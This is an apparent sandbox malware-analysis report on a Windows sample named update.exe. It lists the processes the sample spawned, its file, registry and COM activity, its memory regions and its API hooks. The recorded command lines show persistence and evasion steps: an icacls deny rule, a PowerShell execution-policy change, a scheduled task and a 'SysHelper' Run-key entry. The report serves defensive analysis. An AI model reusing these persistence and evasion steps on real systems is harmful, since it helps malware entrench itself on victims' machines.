46c8e192...aa93

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x8dc	Analysis Target	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe"	-
#2	0x59c	Created Scheduled Job	High (Elevated)	taskeng.exe	taskeng.exe {CD671DAD-4B74-4170-B439-24634829D136} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]	#1
#3	0x8f0	Child Process	High (Elevated)	icacls.exe	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3" /deny *S-1-1-0:(OI)(CI)(DE,DC)	#1
#4	0x904	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --Admin IsNotAutoStart IsNotTask	#1
#6	0x9b4	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --ForNetRes 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40 IsNotAutoStart IsNotTask	#4
#7	0x9bc	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --Service 2308 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40	#4
#8	0x9cc	Child Process	High (Elevated)	1.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe"	#4
#9	0x9e8	Child Process	High (Elevated)	1.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe" --Admin	#8
#10	0x9f0	Child Process	High (Elevated)	powershell.exe	powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned	#9
#11	0x9f8	Child Process	High (Elevated)	2.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\2.exe"	#4
#12	0xa14	Child Process	High (Elevated)	updatewin.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\updatewin.exe"	#4
#14	0x4cc	Autostart	Medium	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart	-
#15	0x68c	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Admin IsAutoStart IsNotTask	#14
#18	0x7f8	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --ForNetRes 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40 IsAutoStart IsNotTask	#15
#19	0x7ac	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Service 1676 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40	#15
#20	0x494	Child Process	High (Elevated)	update.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --Service 2040 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40	#18

Behavior Information - Grouped by Category

Process #1: update.exe

393

Information	Value
ID	#1
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:31, Reason: Analysis Target
Unmonitor	End Time: 00:00:42, Reason: Self Terminated
Monitor Duration	00:00:11

OS Process Information

Information	Value
PID	0x8dc
Parent PID	0x458 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 8E0 0x 0 0x 8EC 0x 8FC 0x 900

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
locale.nls	0x001a0000	0x00206fff	Memory Mapped File	r	-
pagefile_0x0000000000210000	0x00210000	0x00397fff	Pagefile Backed Memory	r	-
private_0x00000000003a0000	0x003a0000	0x003bffff	Private Memory	rw	-
pagefile_0x00000000003a0000	0x003a0000	0x003a4fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000003a0000	0x003a0000	0x003a0fff	Pagefile Backed Memory	rw	-
private_0x00000000003b0000	0x003b0000	0x003bffff	Private Memory	rw	-
pagefile_0x00000000003c0000	0x003c0000	0x003c0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003c0000	0x003c0000	0x003c1fff	Pagefile Backed Memory	r	-
private_0x00000000003d0000	0x003d0000	0x003dffff	Private Memory	rw	-
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	r	-
pagefile_0x00000000003f0000	0x003f0000	0x003f0fff	Pagefile Backed Memory	r	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x00000000004a0000	0x004a0000	0x00620fff	Pagefile Backed Memory	r	-
private_0x0000000000630000	0x00630000	0x0067efff	Private Memory	rw	-
private_0x0000000000630000	0x00630000	0x0066ffff	Private Memory	rw	-
pagefile_0x0000000000670000	0x00670000	0x00671fff	Pagefile Backed Memory	r	-
cversions.2.db	0x00680000	0x00683fff	Memory Mapped File	r	-
private_0x0000000000690000	0x00690000	0x0070ffff	Private Memory	rw	-
private_0x0000000000710000	0x00710000	0x008bffff	Private Memory	rw	-
private_0x0000000000710000	0x00710000	0x007bffff	Private Memory	rw	-
private_0x0000000000710000	0x00710000	0x0074ffff	Private Memory	rw	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x00750000	0x0076efff	Memory Mapped File	r	-
pagefile_0x0000000000770000	0x00770000	0x00770fff	Pagefile Backed Memory	rw	-
private_0x0000000000780000	0x00780000	0x007bffff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x007c0000	0x007effff	Memory Mapped File	r	-
cversions.2.db	0x007f0000	0x007f3fff	Memory Mapped File	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x00800000	0x00865fff	Memory Mapped File	r	-
pagefile_0x0000000000870000	0x00870000	0x00876fff	Pagefile Backed Memory	r	-
private_0x0000000000880000	0x00880000	0x008bffff	Private Memory	rw	-
pagefile_0x00000000008c0000	0x008c0000	0x008c1fff	Pagefile Backed Memory	rw	-
pagefile_0x00000000008d0000	0x008d0000	0x008d0fff	Pagefile Backed Memory	rw	-
private_0x0000000000900000	0x00900000	0x009fffff	Private Memory	rw	-
pagefile_0x0000000000a00000	0x00a00000	0x01dfffff	Pagefile Backed Memory	r	-
private_0x0000000001e00000	0x01e00000	0x0202ffff	Private Memory	rw	-
private_0x0000000001e00000	0x01e00000	0x01f7ffff	Private Memory	rw	-
pagefile_0x0000000001e00000	0x01e00000	0x01edefff	Pagefile Backed Memory	r	-
private_0x0000000001ee0000	0x01ee0000	0x01f1ffff	Private Memory	rw	-
private_0x0000000001f70000	0x01f70000	0x01f7ffff	Private Memory	rw	-
private_0x0000000001ff0000	0x01ff0000	0x0202ffff	Private Memory	rw	-
sortdefault.nls	0x02030000	0x022fefff	Memory Mapped File	r	-
private_0x0000000002300000	0x02300000	0x023fffff	Private Memory	rw	-
private_0x0000000002400000	0x02400000	0x024fffff	Private Memory	rw	-
private_0x0000000002500000	0x02500000	0x025fffff	Private Memory	rw	-
pagefile_0x0000000002600000	0x02600000	0x029f2fff	Pagefile Backed Memory	r	-
private_0x0000000002a00000	0x02a00000	0x02afffff	Private Memory	rw	-
comctl32.dll	0x74b40000	0x74cddfff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
propsys.dll	0x74f40000	0x75034fff	Memory Mapped File	rwx	-
xmllite.dll	0x75040000	0x7506efff	Memory Mapped File	rwx	-
taskschd.dll	0x75070000	0x750ecfff	Memory Mapped File	rwx	-
ntmarta.dll	0x75090000	0x750b0fff	Memory Mapped File	rwx	-
msvcr100.dll	0x750f0000	0x751aefff	Memory Mapped File	rwx	-
dnsapi.dll	0x751b0000	0x751f3fff	Memory Mapped File	rwx	-
winnsi.dll	0x75200000	0x75206fff	Memory Mapped File	rwx	-
iphlpapi.dll	0x75210000	0x7522bfff	Memory Mapped File	rwx	-
winmm.dll	0x75230000	0x75261fff	Memory Mapped File	rwx	-
mpr.dll	0x75270000	0x75281fff	Memory Mapped File	rwx	-
msimg32.dll	0x75290000	0x75294fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
clbcatq.dll	0x754b0000	0x75532fff	Memory Mapped File	rwx	-
ole32.dll	0x75540000	0x7569bfff	Memory Mapped File	rwx	-
wldap32.dll	0x756a0000	0x756e4fff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
iertutil.dll	0x757f0000	0x759eafff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
wininet.dll	0x75be0000	0x75cd4fff	Memory Mapped File	rwx	-
shlwapi.dll	0x75ce0000	0x75d36fff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
devobj.dll	0x75e10000	0x75e21fff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
oleaut32.dll	0x75f60000	0x75feefff	Memory Mapped File	rwx	-
setupapi.dll	0x75ff0000	0x7618cfff	Memory Mapped File	rwx	-
crypt32.dll	0x76190000	0x762acfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
urlmon.dll	0x762e0000	0x76415fff	Memory Mapped File	rwx	-
psapi.dll	0x76420000	0x76424fff	Memory Mapped File	rwx	-
ws2_32.dll	0x764c0000	0x764f4fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
cfgmgr32.dll	0x76640000	0x76666fff	Memory Mapped File	rwx	-
shell32.dll	0x76670000	0x772b9fff	Memory Mapped File	rwx	-
msasn1.dll	0x772c0000	0x772cbfff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
nsi.dll	0x77820000	0x77825fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
private_0x00000000fffad000	0xfffad000	0xfffaffff	Private Memory	rw	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd5000	0xfffd5000	0xfffd7fff	Private Memory	rw	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000900000:+0x1333f	13. entry of update.exe	4 bytes	kernel32.dll:GetCommProperties+0x0 now points to private_0x0000000000690000:+0x1006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	14. entry of update.exe	4 bytes	kernel32.dll:GetThreadSelectorEntry+0x0 now points to pagefile_0x0000000000a00000:+0x4777e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	18. entry of update.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to pagefile_0x0000000000010000:+0x25d7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	21. entry of update.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x0000000000690000:+0x1006a	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	22. entry of update.exe	4 bytes	kernel32.dll:CompareStringW+0x0 now points to pagefile_0x0000000000a00000:+0x47c7e8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	24. entry of update.exe	4 bytes	kernel32.dll:GetLocaleInfoW+0x0 now points to pagefile_0x0000000000a00000:+0x30043	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	26. entry of update.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to pagefile_0x0000000000010000:+0x25b7	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	37. entry of update.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to pagefile_0x0000000000a00000:+0x148be8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000900000:+0x1333f	64. entry of update.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to pagefile_0x0000000000a00000:+0xd38d56	... Actions Go to Installer Region Go to Target Region

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe	449.50 KB	MD5: 99d4feab94f7cda70110a1dc98f470d3 SHA1: 6b5a3ac7431b51298107d7818f2c2cd126dd48fd SHA256: 46c8e192bb6e37452c1b8029987a7c05f64b7766ff692731b050c402d91baa93 SSDeep: 6144:HpipZ4DRWlF6pYiPFWsj9O7yHfMi1toNccQ3opDQvbQiCDiexJgq:JiwWPi9WsjEYfNKO3j1CDV		... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	0.00 KB	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3::		... File Actions Show Properties

Host Behavior

COM (8)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	TaskScheduler	ITaskService	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	TaskScheduler	ITaskService	method_name = Connect, server_name = 2005334480, user = 192, domain = 1613572, password = 9826768	1	Fn
Execute	TaskScheduler	ITaskService	method_name = GetFolder, path = \, new_interface = ITaskFolder	1	Fn
Execute	TaskScheduler	ITaskService	method_name = NewTask, new_interface = ITaskDefinition	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Triggers, new_interface = ITriggerCollection	1	Fn
Execute	TaskScheduler	ITriggerCollection	method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger	1	Fn
Execute	TaskScheduler	IDailyTrigger	method_name = put_StartBoundary, start_boundary = 2018-11-01T13:20:00	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Actions, new_interface = IActionCollection	1	Fn

File (9)

Operation	Filename	Additional Information	Count	Logfile
Create Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3	-	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Copy	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe	1	Fn
Delete	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe	-	1	Fn

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = 0, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3\update.exe" --AutoStart, size = 210, type = REG_EXPAND_SZ	1	Fn

Process (49)

Operation	Process	Additional Information	Count	Logfile
Create	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\544c4f6e-08e8-406f-ae98-d88505d8a2e3" /deny *S-1-1-0:(OI)(CI)(DE,DC)	os_pid = 0x8f0, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe	show_window = SW_SHOW	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\reference assemblies\attend.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\uninstall information\ppdfaccounting.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\firmintroduction.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\reference assemblies\emmafe.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows sidebar\dressed.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\calculations-eternal.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\refine belief dietary.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\internet explorer\brilliant.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\conhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\significance_five_digit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\domestic.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\rocontinually.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows portable devices\privilege.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows nt\sequence.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows media player\abilities_imported_yale.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\discrete.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows mail\subscriptions_comparable_server.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft office\logic_acre.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\msbuild\ad floyd.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\laptop.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dllhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\syswow64\icacls.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn

Module (294)

Operation	Module	Additional Information	Count	Logfile
Load	kernel32.dll	base_address = 0x75a20000	2	Fn
Load	RPCRT4.dll	base_address = 0x772d0000	1	Fn
Load	MPR.dll	base_address = 0x75270000	1	Fn
Load	WININET.dll	base_address = 0x75be0000	1	Fn
Load	WINMM.dll	base_address = 0x75230000	1	Fn
Load	SHLWAPI.dll	base_address = 0x75ce0000	1	Fn
Load	KERNEL32.dll	base_address = 0x75a20000	1	Fn
Load	USER32.dll	base_address = 0x756f0000	1	Fn
Load	ADVAPI32.dll	base_address = 0x75b30000	1	Fn
Load	SHELL32.dll	base_address = 0x76670000	1	Fn
Load	ole32.dll	base_address = 0x75540000	1	Fn
Load	OLEAUT32.dll	base_address = 0x75f60000	1	Fn
Load	IPHLPAPI.DLL	base_address = 0x75210000	1	Fn
Load	WS2_32.dll	base_address = 0x764c0000	1	Fn
Load	DNSAPI.dll	base_address = 0x751b0000	1	Fn
Load	msvcr100.dll	base_address = 0x750f0000	1	Fn
Load	Shell32.dll	base_address = 0x76670000	1	Fn
Load	Psapi.dll	base_address = 0x76420000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75a20000	13	Fn
Get Handle	mscoree.dll	-	1	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe, size = 260	2	Fn
Get Filename	-	process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe, size = 1024	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsAlloc, address_out = 0x75a34f2b	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsGetValue, address_out = 0x75a31252	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsSetValue, address_out = 0x75a34208	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlsFree, address_out = 0x75a3359f	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EncodePointer, address_out = 0x77890fcb	9	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DecodePointer, address_out = 0x77889d35	4	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateToolhelp32Snapshot, address_out = 0x75a5735f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = Module32First, address_out = 0x75ab5cd9	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualAlloc, address_out = 0x75a31856	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualProtect, address_out = 0x75a3435f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = VirtualFree, address_out = 0x75a3186e	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75a33519	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75a4d802	2	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeW, address_out = 0x772f1635	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringW, address_out = 0x77311ee5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidToStringA, address_out = 0x7734d918	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = RpcStringFreeA, address_out = 0x77313fc5	1	Fn
Get Address	c:\windows\syswow64\rpcrt4.dll	function = UuidCreate, address_out = 0x772ef48b	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetCloseEnum, address_out = 0x75272dd6	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetOpenEnumW, address_out = 0x75272f06	1	Fn
Get Address	c:\windows\syswow64\mpr.dll	function = WNetEnumResourceW, address_out = 0x75273058	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x75c0f18e	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x75bfb406	1	Fn
